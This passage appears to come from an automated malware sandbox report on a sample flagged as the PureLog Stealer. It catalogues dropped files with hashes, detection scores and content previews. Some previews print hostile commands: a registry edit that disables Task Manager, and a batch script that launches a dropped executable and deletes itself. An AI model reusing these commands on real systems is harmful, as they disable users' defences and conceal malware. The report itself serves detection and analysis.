                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8...........8.. ....9...@.. .......................@9...........@...................................8.K.....9.p.................... 9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc...p.....9.......8.............@....reloc....... 9.......8.............@..B..................8.....H.......D...8.......s...|.......W.8......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{m...:....& ....8....*(.... ....8........0.......... ........8........E............|.......F.......8........~....(X...~....(\... ....?`... ....~....{....9....& ....8....~....(P... .... .... ....s....~....(T....... ....8g...r...ps....z*8.... ....~....{....:B...& ....87...~....9.... ....~....{j...
                                                                Process:C:\Users\user\Desktop\kBY9lgRaca.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):183
                                                                Entropy (8bit):5.3824312269645995
                                                                Encrypted:false
                                                                SSDEEP:3:KPYqACFoBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKLNBROMWD6bAtqx4d:HStuH1jhRiI36B7tqx4d
                                                                MD5:69496B5B77E0101F9E89BFEB54B8B900
                                                                SHA1:45A51BF9904F2C5694460A1EA5D4390C91E287F5
                                                                SHA-256:12E552DE8C5C53B37509AB351E7374AAFC7F2CA5DA6D97E8854CF6798F94620F
                                                                SHA-512:3D4965F2516A47223F65489E29460206C3A75681949DCC3F5969D44DF1001FAF02EF5EB9662E169F4C552D178BD48438E4DBBAAFB905EB8347EF3E564D021F61
                                                                Malicious:false
                                                                Preview:%GOjFfqJOCNfuO%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%yhrHH%..%aCiIIESJ%"C:\RuntimeDll/cef_process.exe"%TJmHQuc%
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3728384
                                                                Entropy (8bit):7.82563273886745
                                                                Encrypted:false
                                                                SSDEEP:98304:WsTpZJfis3FhJEqWkGcVGPMcFlEpxaomYYVVLWgP:WsrUK/JEqWQVGUcF6aomYYTD
                                                                MD5:C73DF0A231280439C24218C394E0A546
                                                                SHA1:17DD69D2B9EA616CBE77FAFE23832168211C9F1A
                                                                SHA-256:A06A177434AF67F4E36920FBE4CD113AC117B41ED675C887382F42B179849A09
                                                                SHA-512:5BE2417FE44E4AFE43F355F36AB88346487E1960DFC32B82A06A132F02760840C965925EBC6CE842998ED8D4E507B2E23528C123CD2C3EF0FD3D5F289D19B297
                                                                Malicious:true
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8...........8.. ....9...@.. .......................@9...........@...................................8.K.....9.p.................... 9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc...p.....9.......8.............@....reloc....... 9.......8.............@..B..................8.....H.......D...8.......s...|.......W.8......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{m...:....& ....8....*(.... ....8........0.......... ........8........E............|.......F.......8........~....(X...~....(\... ....?`... ....~....{....9....& ....8....~....(P... .... .... ....s....~....(T....... ....8g...r...ps....z*8.... ....~....{....:B...& ....87...~....9.... ....~....{j...
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1698
                                                                Entropy (8bit):5.367720686892084
                                                                Encrypted:false
                                                                SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                                MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                                SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                                SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                                SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1510207563435464
                                                                Encrypted:false
                                                                SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                Malicious:false
                                                                Preview:@...e................................................@..........
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):202
                                                                Entropy (8bit):5.284006814519397
                                                                Encrypted:false
                                                                SSDEEP:6:hCRLuVFOOr+DEimKQkSlmMKKOZG1cNwi23fboh:CuVEOCDEi9KmMjZDG
                                                                MD5:CE998E9E0FAE4CC8F0B467A0296379AA
                                                                SHA1:C79EB103EEACB84BF8A6430B26BC579A101F25F1
                                                                SHA-256:6FCD34A78EA621FFF4852066216C9F1091C70C5A01A40863CDA6F680F8B11A9C
                                                                SHA-512:A0DD7843058F5A3F811109274C9587B9A4459589F313568A316B21783AAF9CBCE1E16F2093F938F3B8D29FB41D60199DC09EA4DD85536DBB9B4A4814CFBE569C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\0MaLlOrxiN.bat"
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):25
                                                                Entropy (8bit):4.403856189774723
                                                                Encrypted:false
                                                                SSDEEP:3:Mnsgwn9In:Msl9I
                                                                MD5:E5ECE1039D3A31C4F5EFB0F760129D32
                                                                SHA1:44E42141C2A9A42E0999603AC4724F5DA5B038E6
                                                                SHA-256:24E50C8CC1407282EC86FA58173CDD53F9F0BA689E4D397C2C39CC23DDF6F23A
                                                                SHA-512:1FBDD4699D518A0AC40CDAAB055F5E50827410319D0D1B30C684C6FEAFF113EE95A6C54D3D197E8CB912F2448F48F59D07B4A7FBD5EF08B4BBC7895309B4EB07
                                                                Malicious:false
                                                                Preview:zb7rDsgI5nZ5LFSpxOByg4rAT
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):22016
                                                                Entropy (8bit):5.41854385721431
                                                                Encrypted:false
                                                                SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                Joe Sandbox View:
                                                                • Filename: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, Detection: malicious, Browse
                                                                • Filename: FMd6ntIhQY.exe, Detection: malicious, Browse
                                                                • Filename: jD1RqkyUNm.exe, Detection: malicious, Browse
                                                                • Filename: ggJWCFp2S3.exe, Detection: malicious, Browse
                                                                • Filename: qM9xet97tX.exe, Detection: malicious, Browse
                                                                • Filename: NHd2wtJdTH.exe, Detection: malicious, Browse
                                                                • Filename: Z7q8C34yfN.exe, Detection: malicious, Browse
                                                                • Filename: VrKU8bWf4W.exe, Detection: malicious, Browse
                                                                • Filename: 4NE6yDivAo.exe, Detection: malicious, Browse
                                                                • Filename: tSht4UNfrv.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):39936
                                                                Entropy (8bit):5.660491370279985
                                                                Encrypted:false
                                                                SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                MD5:240E98D38E0B679F055470167D247022
                                                                SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):294912
                                                                Entropy (8bit):6.010605469502259
                                                                Encrypted:false
                                                                SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
